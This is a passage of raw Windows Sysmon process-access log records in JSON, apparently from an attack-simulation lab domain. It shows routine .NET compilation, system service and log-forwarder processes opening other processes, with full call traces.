{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.419\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.419","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.419\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.419","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.513\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00109CDA0C00}\r\nTargetProcessId: 604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.513","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00109CDA0C00}","TargetProcessId":"604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00109CDA0C00}\r\nTargetProcessId: 604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00109CDA0C00}","TargetProcessId":"604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.513\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00109CDA0C00}\r\nTargetProcessId: 604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.513","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00109CDA0C00}","TargetProcessId":"604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.700\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\F